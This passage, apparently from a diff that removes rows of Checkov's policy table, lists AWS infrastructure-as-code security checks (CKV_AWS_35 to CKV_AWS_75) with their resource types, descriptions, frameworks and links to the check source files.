-|  232 | CKV_AWS_35               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Cloudformation          | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py)                                                                          |
-|  233 | CKV_AWS_35               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Terraform               | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py)                                                                 |
-|  234 | CKV_AWS_36               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Cloudformation          | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py)                                                                    |
-|  235 | CKV_AWS_36               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Terraform               | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py)                                                                         |
-|  236 | CKV_AWS_37               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS control plane logging is enabled for all log types                                                                                                                                     | Terraform               | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py)                                                                           |
-|  237 | CKV_AWS_38               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0                                                                                                                                            | Terraform               | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py)                                                                                 |
-|  238 | CKV_AWS_39               | resource                         | aws_eks_cluster                                                                                  | Ensure Amazon EKS public endpoint disabled                                                                                                                                                               | Terraform               | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py)                                                                                         |
-|  239 | CKV_AWS_40               | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation          | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                    |
-|  240 | CKV_AWS_40               | resource                         | aws_iam_policy_attachment                                                                        | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  241 | CKV_AWS_40               | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  242 | CKV_AWS_40               | resource                         | aws_iam_user_policy_attachment                                                                   | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform               | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  243 | CKV_AWS_41               | provider                         | aws                                                                                              | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py)                                                                                                 |
-|  244 | CKV_AWS_41               | resource                         | serverless_aws                                                                                   | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | serverless              | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py)                                                                                          |
-|  245 | CKV_AWS_42               | resource                         | AWS::EFS::FileSystem                                                                             | Ensure EFS is securely encrypted                                                                                                                                                                         | Cloudformation          | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py)                                                                          |
-|  246 | CKV_AWS_42               | resource                         | aws_efs_file_system                                                                              | Ensure EFS is securely encrypted                                                                                                                                                                         | Terraform               | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py)                                                                               |
-|  247 | CKV_AWS_43               | resource                         | AWS::Kinesis::Stream                                                                             | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Cloudformation          | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py)                                                            |
-|  248 | CKV_AWS_43               | resource                         | aws_kinesis_stream                                                                               | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Terraform               | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py)                                                                 |
-|  249 | CKV_AWS_44               | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Cloudformation          | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                      |
-|  250 | CKV_AWS_44               | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Terraform               | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                           |
-|  251 | CKV_AWS_45               | resource                         | AWS::Lambda::Function                                                                            | Ensure no hard-coded secrets exist in Lambda environment                                                                                                                                                 | Cloudformation          | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                          |
-|  252 | CKV_AWS_45               | resource                         | AWS::Serverless::Function                                                                        | Ensure no hard-coded secrets exist in Lambda environment                                                                                                                                                 | Cloudformation          | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                          |
-|  253 | CKV_AWS_45               | resource                         | aws_lambda_function                                                                              | Ensure no hard-coded secrets exist in lambda environment                                                                                                                                                 | Terraform               | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                               |
-|  254 | CKV_AWS_46               | resource                         | AWS::EC2::Instance                                                                               | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Cloudformation          | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py)                                                                                      |
-|  255 | CKV_AWS_46               | resource                         | aws_instance                                                                                     | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  256 | CKV_AWS_46               | resource                         | aws_launch_configuration                                                                         | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  257 | CKV_AWS_46               | resource                         | aws_launch_template                                                                              | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform               | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  258 | CKV_AWS_47               | resource                         | AWS::DAX::Cluster                                                                                | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Cloudformation          | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py)                                                                                        |
-|  259 | CKV_AWS_47               | resource                         | aws_dax_cluster                                                                                  | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Terraform               | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py)                                                                                             |
-|  260 | CKV_AWS_48               | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker logging is enabled                                                                                                                                                                      | Terraform               | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py)                                                                                         |
-|  261 | CKV_AWS_49               | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py)                                                                           |
-|  262 | CKV_AWS_49               | resource                         | serverless_aws                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | serverless              | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py)                                                                      |
-|  263 | CKV_AWS_50               | resource                         | aws_lambda_function                                                                              | X-Ray tracing is enabled for Lambda                                                                                                                                                                      | Terraform               | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py)                                                                                     |
-|  264 | CKV_AWS_51               | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Cloudformation          | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py)                                                                                  |
-|  265 | CKV_AWS_51               | resource                         | aws_ecr_repository                                                                               | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Terraform               | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py)                                                                                       |
-|  266 | CKV_AWS_53               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has block public ACLs enabled                                                                                                                                                           | Cloudformation          | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py)                                                                                |
-|  267 | CKV_AWS_53               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has block public ACLS enabled                                                                                                                                                           | Terraform               | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py)                                                                                     |
-|  268 | CKV_AWS_54               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Cloudformation          | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py)                                                                            |
-|  269 | CKV_AWS_54               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Terraform               | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py)                                                                                 |
-|  270 | CKV_AWS_55               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Cloudformation          | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py)                                                                              |
-|  271 | CKV_AWS_55               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Terraform               | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py)                                                                                   |
-|  272 | CKV_AWS_56               | resource                         | AWS::S3::Bucket                                                                                  | Ensure S3 bucket has RestrictPublicBuckets enabled                                                                                                                                                       | Cloudformation          | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                    |
-|  273 | CKV_AWS_56               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure S3 bucket has 'restrict_public_buckets' enabled                                                                                                                                                   | Terraform               | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                         |
-|  274 | CKV_AWS_57               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket does not allow WRITE permissions to everyone                                                                                                                                        | Cloudformation          | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py)                                                                                  |
-|  275 | CKV_AWS_57               | resource                         | aws_s3_bucket                                                                                    | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform               | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                               |
-|  276 | CKV_AWS_57               | resource                         | aws_s3_bucket_acl                                                                                | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform               | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                               |
-|  277 | CKV_AWS_58               | resource                         | AWS::EKS::Cluster                                                                                | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Cloudformation          | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py)                                                                          |
-|  278 | CKV_AWS_58               | resource                         | aws_eks_cluster                                                                                  | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Terraform               | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py)                                                                               |
-|  279 | CKV_AWS_59               | resource                         | AWS::ApiGateway::Method                                                                          | Ensure there is no open access to back-end resources through API                                                                                                                                         | Cloudformation          | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py)                                                                    |
-|  280 | CKV_AWS_59               | resource                         | aws_api_gateway_method                                                                           | Ensure there is no open access to back-end resources through API                                                                                                                                         | Terraform               | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py)                                                                         |
-|  281 | CKV_AWS_60               | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Cloudformation          | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                |
-|  282 | CKV_AWS_60               | resource                         | aws_iam_role                                                                                     | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Terraform               | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                     |
-|  283 | CKV_AWS_61               | resource                         | AWS::IAM::Role                                                                                   | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Cloudformation          | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                        |
-|  284 | CKV_AWS_61               | resource                         | aws_iam_role                                                                                     | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Terraform               | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                             |
-|  285 | CKV_AWS_62               | resource                         | AWS::IAM::Group                                                                                  | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                      |
-|  286 | CKV_AWS_62               | resource                         | AWS::IAM::Policy                                                                                 | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                      |
-|  287 | CKV_AWS_62               | resource                         | AWS::IAM::Role                                                                                   | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                      |
-|  288 | CKV_AWS_62               | resource                         | AWS::IAM::User                                                                                   | Ensure no IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                   | Cloudformation          | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                      |
-|  289 | CKV_AWS_62               | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  290 | CKV_AWS_62               | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  291 | CKV_AWS_62               | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  292 | CKV_AWS_62               | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  293 | CKV_AWS_62               | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  294 | CKV_AWS_63               | resource                         | AWS::IAM::Group                                                                                  | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                            |
-|  295 | CKV_AWS_63               | resource                         | AWS::IAM::Policy                                                                                 | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                            |
-|  296 | CKV_AWS_63               | resource                         | AWS::IAM::Role                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                            |
-|  297 | CKV_AWS_63               | resource                         | AWS::IAM::User                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Cloudformation          | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                            |
-|  298 | CKV_AWS_63               | resource                         | aws_iam_group_policy                                                                             | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  299 | CKV_AWS_63               | resource                         | aws_iam_policy                                                                                   | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  300 | CKV_AWS_63               | resource                         | aws_iam_role_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  301 | CKV_AWS_63               | resource                         | aws_iam_user_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  302 | CKV_AWS_63               | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform               | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  303 | CKV_AWS_64               | resource                         | AWS::Redshift::Cluster                                                                           | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Cloudformation          | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py)                                                                |
-|  304 | CKV_AWS_64               | resource                         | aws_redshift_cluster                                                                             | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Terraform               | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py)                                                                     |
-|  305 | CKV_AWS_65               | resource                         | AWS::ECS::Cluster                                                                                | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Cloudformation          | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py)                                                            |
-|  306 | CKV_AWS_65               | resource                         | aws_ecs_cluster                                                                                  | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Terraform               | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py)                                                                 |
-|  307 | CKV_AWS_66               | resource                         | AWS::Logs::LogGroup                                                                              | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Cloudformation          | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                            |
-|  308 | CKV_AWS_66               | resource                         | aws_cloudwatch_log_group                                                                         | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Terraform               | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                                 |
-|  309 | CKV_AWS_67               | resource                         | AWS::CloudTrail::Trail                                                                           | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Cloudformation          | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py)                                                                        |
-|  310 | CKV_AWS_67               | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Terraform               | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py)                                                                             |
-|  311 | CKV_AWS_68               | resource                         | AWS::CloudFront::Distribution                                                                    | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Cloudformation          | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py)                                                                                              |
-|  312 | CKV_AWS_68               | resource                         | aws_cloudfront_distribution                                                                      | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Terraform               | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py)                                                                                                   |
-|  313 | CKV_AWS_69               | resource                         | AWS::AmazonMQ::Broker                                                                            | Ensure Amazon MQ Broker should not have public access                                                                                                                                                    | Cloudformation          | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py)                                                              |
-|  314 | CKV_AWS_69               | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker is not publicly exposed                                                                                                                                                                 | Terraform               | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py)                                                                   |
-|  315 | CKV_AWS_70               | resource                         | aws_s3_bucket                                                                                    | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform               | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                               |
-|  316 | CKV_AWS_70               | resource                         | aws_s3_bucket_policy                                                                             | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform               | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                               |
-|  317 | CKV_AWS_71               | resource                         | AWS::Redshift::Cluster                                                                           | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Cloudformation          | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py)                                                                      |
-|  318 | CKV_AWS_71               | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Terraform               | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py)                                                                           |
-|  319 | CKV_AWS_72               | resource                         | aws_sqs_queue_policy                                                                             | Ensure SQS policy does not allow ALL (*) actions.                                                                                                                                                        | Terraform               | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py)                                                                                                     |
-|  320 | CKV_AWS_73               | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Cloudformation          | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py)                                                                                      |
-|  321 | CKV_AWS_73               | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Cloudformation          | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py)                                                                                      |
-|  322 | CKV_AWS_73               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Terraform               | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py)                                                                                           |
-|  323 | CKV_AWS_74               | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Cloudformation          | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py)                                                                                    |
-|  324 | CKV_AWS_74               | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Terraform               | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py)                                                                                         |
-|  325 | CKV_AWS_75               | resource                         | aws_globalaccelerator_accelerator                                                                | Ensure Global Accelerator accelerator has flow logs enabled                                                                                                                                              | Terraform               | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py)                                               |
